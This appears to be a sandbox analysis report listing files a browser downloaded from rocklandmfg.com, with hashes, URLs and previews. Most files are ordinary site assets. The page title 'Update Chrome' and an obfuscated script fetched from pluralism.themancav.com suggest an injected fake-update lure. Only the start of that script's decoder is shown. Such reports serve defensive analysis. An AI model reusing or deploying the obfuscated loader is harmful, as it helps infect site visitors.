                                                                            Preview:@font-face{font-family:sp-wps-fontello;src:url(../font/fontello.eot?9168645);src:url(../font/fontello.eot?9168645#iefix) format('embedded-opentype'),url(../font/fontello.woff2?9168645) format('woff2'),url(../font/fontello.woff?9168645) format('woff'),url(../font/fontello.ttf?9168645) format('truetype'),url(../font/fontello.svg?9168645#fontello) format('svg');font-weight:400;font-style:normal}[class*=" sp-wps-icon-"]:before,[class^=sp-wps-icon-]:before{font-family:sp-wps-fontello;font-style:normal;font-weight:400;speak:never;display:inline-block;text-decoration:inherit;width:1em;margin-right:.2em;text-align:center;font-variant:normal;text-transform:none;line-height:1em;margin-left:.2em;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-display:swap}.sp-wps-icon-block:before{content:'\e808'}.sp-wps-icon-arrow-triangle-left:before{content:'\e800'}.sp-wps-icon-right-open-1:before{content:'\e802'}.sp-wps-icon-right-open-big:before{content:'\e804'}.sp-wps-icon-right-op
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1468), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1468
                                                                            Entropy (8bit):5.804058862681796
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:5887BF7E508CA3652FAFA189AE4A329A
                                                                            SHA1:BE4E330B2BBCE518A644499405FC12DD70F3BBAA
                                                                            SHA-256:1A3A353536599F6591C8DA0FF7CEEFA14D617CC6059FEF6450A3BE30C4BAB534
                                                                            SHA-512:A2E5E8BEFCA5929BC1186C4BCA753B756B2DBE9DFEE32FE06983E94F7F87B38B78C8E2E010DC0EE6D258E2723517ACF8CC6D2B9F01CF270B3C1B5141184DA78C
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://www.google.com/recaptcha/api.js?render=6LdOnlUpAAAAAKunKPeS6YuADZeBrS-fDPLUn16w&ver=1.6.0
                                                                            Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('6LdOnlUpAAAAAKunKPeS6YuADZeBrS-fDPLUn16w');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 170 x 65, 8-bit colormap, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):2652
                                                                            Entropy (8bit):7.813424864543373
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:67842960D624338133D6B2F392865752
                                                                            SHA1:1C7EE591A0F023D2ADD78AD61529AA5017D42FE2
                                                                            SHA-256:8F3548547D1326336AF6A15E7F0C3F8A23DD6A1C06B6D92CAA318BBCB19FB84E
                                                                            SHA-512:8DCB052F40EBB7E0E212478A20FC00639B07586B46AAC1897A7C86DD401A3507CD181CC842C527011268B714C3CAA4A476C8100CD99173B5104E9E7D9D823010
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/11/doosen.png
                                                                            Preview:.PNG........IHDR.......A.....v+......PLTEGpL................................777...............===......... ..................gggEEE......hhh......YYY~~~..........:::...fff\\\111..................{{{mmm......]]]......LLL.................................QQQ......TTT.........EEE......###.........===.........888.....................................))).................aaa.................LLL...............yyy..............RRR......888......ooo___.........EEE......333...%%%...---ggg111XXX...........[[[qqq...mmmeee...(((BBBDDD...777888UUU......555ppp888www.....HHH...XXXvvvrrr.........CCC...GGG......666{{{......www............ttt........```zzz333...iiinnnMMMooo.........@@@...bbb......LLL...&&&...............xxx...'''...........555 ........%%%^^^---SSS...................###@@@...zzzNNN.....I.....tRNS.,1-/02....3,,"..3..(.)...4..)3.#..20(...+).)015...#0.&..-#.03.$%6..!...!..+18./..22$.,&...... ..2.....$.%..'."/.4$..%..../ ,..$6*-40-#..).,.(!./.,.2&,,..#!.).+,.0,3.5#2..*.2&..--
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1690)
                                                                            Category:downloaded
                                                                            Size (bytes):1720
                                                                            Entropy (8bit):5.267625476247862
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:691A1E43450E7CDA541A3BD6F10FD5DB
                                                                            SHA1:D3A78CB77CCEC297C9D32FEE99A2A4761F604A8C
                                                                            SHA-256:8B083F64F2E9E8AC445C730DFCE7013CC6449CE155FD1C2F42B60EDBA4ECB4B1
                                                                            SHA-512:A32EBE942E704DA64381E392FFC20ED4F9D8DAF71227A06F2DC0CA5C037675AB67E5B5A5DDF9BCB77B1872308DAA780CC0E6EC5A2469BCD51444ECE4F3B3DE0D
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.9.4.1
                                                                            Preview:/*! js-cookie v3.0.5 | MIT */.!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self,function(){var n=e.Cookies,o=e.Cookies=t();o.noConflict=function(){return e.Cookies=n,o}}())}(this,function(){"use strict";function e(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var o in n)e[o]=n[o]}return e}return function t(n,o){function r(t,r,i){if("undefined"!=typeof document){"number"==typeof(i=e({},o,i)).expires&&(i.expires=new Date(Date.now()+864e5*i.expires)),i.expires&&(i.expires=i.expires.toUTCString()),t=encodeURIComponent(t).replace(/%(2[346B]|5E|60|7C)/g,decodeURIComponent).replace(/[()]/g,escape);var c="";for(var u in i)i[u]&&(c+="; "+u,!0!==i[u]&&(c+="="+i[u].split(";")[0]));return document.cookie=t+"="+n.write(r,t)+c}}return Object.create({set:r,get:function(e){if("undefined"!=typeof document&&(!arguments.length||e)){for(var t=document.co
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (31434), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):31434
                                                                            Entropy (8bit):4.977157365626816
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:7BC3A50B60F8242CEF9942CFDAB91372
                                                                            SHA1:2926630723D03593B53F579E6CB6BB6EBD1985D7
                                                                            SHA-256:E4F3EC0C3C677A420EDEFD557EE0541D395BD1AB5B66F05A37BF9C72B71A4626
                                                                            SHA-512:8691731F0176CCAB5E4E6CFA554BE3F2A5E07853E99D7FCF9811035F774520A88ACF6ADD158ABEAA949542EECB1CFA792331FD1539330352DD80FCC832A7038E
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://pluralism.themancav.com/0M/mravthcS07dyf5vvKj6Lt3I+9upDGv7qSz7mqide/oZ+PrQ==
                                                                            Preview:function a0_0x10db(_0x4f7026,_0x1b0583){var _0x48730f=a0_0x4c53();return a0_0x10db=function(_0x49335e,_0x29deee){_0x49335e=_0x49335e-(-0x1f5*-0xb+0x1f3b+-0x33a9);var _0x32237f=_0x48730f[_0x49335e];if(a0_0x10db['BCJsxQ']===undefined){var _0x133ed6=function(_0x373916){var _0x3c13d0='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x5074dd='',_0x2e2a32='';for(var _0x5b0388=0x16*0x92+0x6*-0x2c9+-0x42a*-0x1,_0x391058,_0x383a65,_0x15f0d6=-0x1*-0xe8d+0x13*-0x1af+0x24*0x7c;_0x383a65=_0x373916['charAt'](_0x15f0d6++);~_0x383a65&&(_0x391058=_0x5b0388%(-0x4f*0x7c+-0x1a42+-0x5de*-0xb)?_0x391058*(0x2235+-0x13b1+-0x1*0xe44)+_0x383a65:_0x383a65,_0x5b0388++%(0x7b5+0x33b*-0x5+0x1*0x876))?_0x5074dd+=String['fromCharCode'](0x103+-0x1525*-0x1+0x1*-0x1529&_0x391058>>(-(-0x36d*0x3+-0x3*0x1f3+-0x811*-0x2)*_0x5b0388&0x1417+-0x4*-0x927+-0x38ad)):0x1*-0x13+0x30*-0x2a+-0x7f3*-0x1){_0x383a65=_0x3c13d0['indexOf'](_0x383a65);}for(var _0x472d8f=-0x4ee+-0x2628+-0x5*-0x89e,_0x529c96=_0x5074dd['l
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (4825), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):4825
                                                                            Entropy (8bit):5.806011457909779
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:287301DF0DB525D3D148407F3C4C2910
                                                                            SHA1:F4F813D0982481A49511AD20BBF5F3ACC2F2D4DC
                                                                            SHA-256:98213AD2DA06256452E0DB44CB3B6EA965451A623C8D67E0D72FA87C1D6991BA
                                                                            SHA-512:105D7DE7EE62FEC330B1FB7A494E387B9450E3DE8766ACF3F1F337D4C3CB2EC6D02BF7277F0E2F4AA6B2757D4824D5B6341BDC070AC8684E36CC2F825ECB9385
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/832604732/?random=1732046732616&cv=11&fst=1732046732616&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9186245223z89176964486za200zb9176964486&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855&u_w=1280&u_h=1024&url=https%3A%2F%2Frocklandmfg.com%2F&hn=www.googleadservices.com&frm=0&tiba=Update%20Chrome&did=dZTQ1Zm&gdid=dZTQ1Zm&npa=0&pscdl=noapi&auid=1523749805.1732046730&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(b,a,c){if(b==Array.prototype||b==Object.prototype)return b;b[a]=c.value;return b};function k(b){b=["object"==typeof globalThis&&globalThis,b,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var a=0;a<b.length;++a){var c=b[a];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");} var m=k(this),n=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",q={},t={};function u(b,a,c){if(!c||b!=null){c=t[a];if(c==null)return b[a];c=b[c];return c!==void 0?c:b[a]}} function v(b,a,c){if(a)a:{var d=b.split(".");b=d.length===1;var e=d[0],g;!b&&e in q?g=q:g=m;for(e=0;e<d.length-1;e++){var f=d[e];if(!(f in g))break a;g=g[f]}d=d[d.length-1];c=n&&c==="es6"?g[d]:null;a=a(c);a!=null&&(b?h(q,d,{configurable:!0,writable:!0,value:a}):a!==c&&(t[d]===void 0&&(b=Math.random()*1E9>>>0,t[d]=n?m.Symbol(d):"$jscp$"+b+"$"+d),h(g,t[d],{co
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 170 x 65, 8-bit colormap, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):956
                                                                            Entropy (8bit):7.60720460616829
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:D8D29B3D7460E69AA57D1B6C661D5E59
                                                                            SHA1:6C635F90985B1C7DB2E513145A99D89A41781CF6
                                                                            SHA-256:4387AAF4872E2D14A10AEE919603112829968359E718B63D941876D474F1F2FE
                                                                            SHA-512:BF3A1817EA083F7AD165B9357CDD82DA2E59DA9AAFCEE42C9C0925C56727D2786DB16DB18AF9CBD028A73F85B059985EA78337C807D9B4A2FB6C5472F3F14116
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/uploads/2023/02/sany.png
                                                                            Preview:.PNG........IHDR.......A.....v+......PLTE...]]]]]]]]]]]]]]]]]]]]]]]]]]]..."....tRNS......!&,3..3"...CIDATx...n.0.........n'.q...\....].!v>.A............./0.:Lpo.9.(y\..M.JV.u...:y..I?rLV..#.!I9.;i...t...d.?.L..($.)t..A......+O2|..A.@gG.<... .vq.~s.........<P..D.83..1...7.J.AA..(.37...yoyd.B.?..*.j...l..cFT.....q.J.r0W;...J....XXMukKZ.Z.A....q....NmipI..HL(/U.'d.JM..q..pJ........;RR.......!..+.ed=..S..X">..{.T..y..x......%..o...fU..:.k'.5j...d=..L3....[UJR..@m..'.?...Ph. J..Iu .7.:.<.............c.,..F....D.B54..c..y.x...A..=5.g.j..hRE[N.T.g_....oK.*.:...y.U..A..q..;..z.W...._<".j.%O...6.c..ME.4'i.4@ .{...w..*j...[......{1.."..U..ph..*<...b..\NG..{5..vU..{..6..{..*...N.wTf.x0.;J.6!.*.#U..%.....T._b}UE.D.^G.k..q.hY5.".....YU....^:b.{.+q....#.[R..T.d^.....\.....7.Y....~.'AF.._.T.2Gt}.a..A..J..@V..G.............p......5.......7.yaZp....T...g..q.nE..H....F.:\...7...VT^Xi$]qO...../.>?.><<<<<|....M........IEND.B`.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                                                            Category:dropped
                                                                            Size (bytes):647
                                                                            Entropy (8bit):7.367940739901487
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:F5F6626E11EE3A9479C8C1216857DFDE
                                                                            SHA1:9D6940AC291B761E35B1E80D9567BA8C7DB7B9DE
                                                                            SHA-256:A2E1F1BD60D49D75D7FA8D55B47E2B1AB854D885061319190C05C0C5ACB68437
                                                                            SHA-512:CC1D125F0A3E621DF445B8AC6893880B582E43F440A9153D47DBD1F665600266D357B2A57A44398EC16B1B430F97A696750A6EE878E4ECAC94745A9EF3B728F2
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            Preview:.PNG........IHDR...d...d.....G<ef...?PLTE... (((***,,,------,,,+++,,,---,,,---,,,---,,,,,,,,,,,,------..D.....tRNS.. 0@P`op..............z....IDATx.....0.D..........[G....i...O..l....G......E....?.S..v.j..`......4..Lz..E..i..Ir...e...d...4...4......}..2....jk..F......].0F ..l.....R...d...D4..y.wD>D.t.G`..yJ...p+y.&r.t..h.....e...Z`V.$...........x..!..o.ze1.c.A..8.*.X...!q.R...F..m.F.4%..`....x6....x:].;....^.px...R..G.[.\E)3._......)....eK.jJ.<.z..&.|..|.f%}.a[.9}.n......}..>D.2Bn.9.t..Z.@N-........9r...{^..8..D.j3E...}H.......U.(.T...6r.A.0df].O1..<7y.d"..S...7|$5[....>D;..:.%...q.oJ../ ....W....f;........IEND.B`.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:downloaded
                                                                            Size (bytes):136
                                                                            Entropy (8bit):4.903727065844455
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:D6183D8A011DD16F0DF03730298B0F8D
                                                                            SHA1:D4F571245B6FE8A79998F9C035E6E5876C838794
                                                                            SHA-256:09173061A68491D44314835FEF2B05566728B1B72A90CF0361132C65B54AF994
                                                                            SHA-512:98861B536B07B4F39655F9F5084AB7A193B8995732473BFE6920828F4D5DFB0CA4D7221A11695DF35FBE6391AD3D82BBE4E96D10C20036CEB077B28001B7E0BE
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://forms.hscollectedforms.net/collected-forms/v1/config/json?portalId=47864039&utk=
                                                                            Preview:{"portalId":47864039,"submissionsApiDomain":"forms.hubspot.com","reportScraperTest":false,"formCaptureEnabled":true,"token":-1668641937}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):142864
                                                                            Entropy (8bit):5.247392384192192
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:A7F510969EA522DA61CB95BAFB4725D7
                                                                            SHA1:6FE4B22F3D3D67B55600D2E045CE249153A2C1DC
                                                                            SHA-256:7ABD85C2B9DEADA291E7AA4C89BAF508F49DBB4F47F9E18B528B9ECE586B282E
                                                                            SHA-512:BF4ABEF4C9DB7CD28A6EC78279A044CD85094F0786045C86B5304420BE7321ED74A830CF57A75A164BDBAD63C7AE6C284A4278DF20C582998C0E45B6311B2B5A
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/plugins/woo-product-slider/src/Frontend/assets/js/swiper.min.js?ver=2.8.2
                                                                            Preview:!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).Swiper=t()}(this,(function(){"use strict";function e(e){return null!==e&&"object"==typeof e&&"constructor"in e&&e.constructor===Object}function t(s,a){void 0===s&&(s={}),void 0===a&&(a={}),Object.keys(a).forEach(i=>{void 0===s[i]?s[i]=a[i]:e(a[i])&&e(s[i])&&Object.keys(a[i]).length>0&&t(s[i],a[i])})}const s={body:{},addEventListener(){},removeEventListener(){},activeElement:{blur(){},nodeName:""},querySelector:()=>null,querySelectorAll:()=>[],getElementById:()=>null,createEvent:()=>({initEvent(){}}),createElement:()=>({children:[],childNodes:[],style:{},setAttribute(){},getElementsByTagName:()=>[]}),createElementNS:()=>({}),importNode:()=>null,location:{hash:"",host:"",hostname:"",href:"",origin:"",pathname:"",protocol:"",search:""}};function a(){const e="undefined"!=typeof document?document:{};retur
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (30343)
                                                                            Category:downloaded
                                                                            Size (bytes):49935
                                                                            Entropy (8bit):4.823273149899454
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:57302B6CEC774F116A26A5E1690E7F91
                                                                            SHA1:069D18F167DC68937186D69CAA58410B5820721D
                                                                            SHA-256:7ADB967745932B25C31DA3EF4A92F2B8E166926A7A8476FE8C8C58FC84B95FA3
                                                                            SHA-512:E51C5B6B302D87540E94436C016DAB3B8981248E591D1FAC8CA016E3B9CD234E2164FC55B651AC03DFF254E5A2482777D8E17F906C65FA238187A1A1F4E3A317
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/css/font-awesome-legacy.min.css?ver=4.7.1
                                                                            Preview:.@font-face{..font-family:'FontAwesome';..src:url('fonts/fontawesome-webfont.eot?v=4.2');..src:url('fonts/fontawesome-webfont.eot?#iefix&v=4.2') format('embedded-opentype'),...url('fonts/fontawesome-webfont.svg#fontawesomeregular?v=4.2') format('svg'),.. url('fonts/fontawesome-webfont.woff?v=4.2') format('woff'),.. url('fonts/fontawesome-webfont.ttf?v=4.2') format('truetype');..font-weight:normal;..font-display: block;..font-style:normal;.}.i[class^="icon-"],[class*=" icon-"], i[class*="fa-"], span[class*="fa-"]{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;-webkit-font-smoothing:antialiased;*margin-right:.3em;}.[class^="icon-"]:before,[class*=" icon-"]:before{text-decoration:inherit;speak:none;}..icon-large:before{vertical-align:-10%;font-size:1.3333333333333333em;}.[class^="icon-"].icon-fixed-width,[class*=" icon-"].icon-fixed-width{display:inline-block;width:1.1428571428571428em;text-align:right;padding-right:0.2857142857142857em;}[class^
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2320)
                                                                            Category:downloaded
                                                                            Size (bytes):2392
                                                                            Entropy (8bit):5.115603596289524
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:56BA0CDB72B1B00226A21FE08251054A
                                                                            SHA1:82BEF20F71EB674C7D1D63242C80AFBC1E6D8274
                                                                            SHA-256:15A71D32B340BF3641581AC5B4F37887B9CB3981477D5886EC5849749C8A36E7
                                                                            SHA-512:6F33BBC08A61FF3FBFD3533F16355F7C804F2C151496DA3FF0BC14939E7BAA44CA7DA56BC93FB555AFD59E1ACE12BEB8DECCF3E3FA208AE66D66B8D4F40BA718
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://rocklandmfg.com/wp-content/themes/salient/js/build/third-party/jquery.easing.min.js?ver=1.3
                                                                            Preview:/*.* jQuery Easing v1.4.1 - http://gsgd.co.uk/sandbox/jquery/easing/.*/.!function(n){"function"==typeof define&&define.amd?define(["jquery"],function(e){return n(e)}):"object"==typeof module&&"object"==typeof module.exports?module.exports=n(require("jquery")):n(jQuery)}(function(n){function e(n){var e=7.5625,t=2.75;return n<1/t?e*n*n:n<2/t?e*(n-=1.5/t)*n+.75:n<2.5/t?e*(n-=2.25/t)*n+.9375:e*(n-=2.625/t)*n+.984375}void 0!==n.easing&&(n.easing.jswing=n.easing.swing);var t=Math.pow,u=Math.sqrt,r=Math.sin,i=Math.cos,a=Math.PI,o=1.70158,c=1.525*o,s=2*a/3,f=2*a/4.5;return n.extend(n.easing,{def:"easeOutQuad",swing:function(e){return n.easing[n.easing.def](e)},easeInQuad:function(n){return n*n},easeOutQuad:function(n){return 1-(1-n)*(1-n)},easeInOutQuad:function(n){return n<.5?2*n*n:1-t(-2*n+2,2)/2},easeInCubic:function(n){return n*n*n},easeOutCubic:function(n){return 1-t(1-n,3)},easeInOutCubic:function(n){return n<.5?4*n*n*n:1-t(-2*n+2,3)/2},easeInQuart:function(n){return n*n*n*n},easeOutQuar
                                                                            No static file info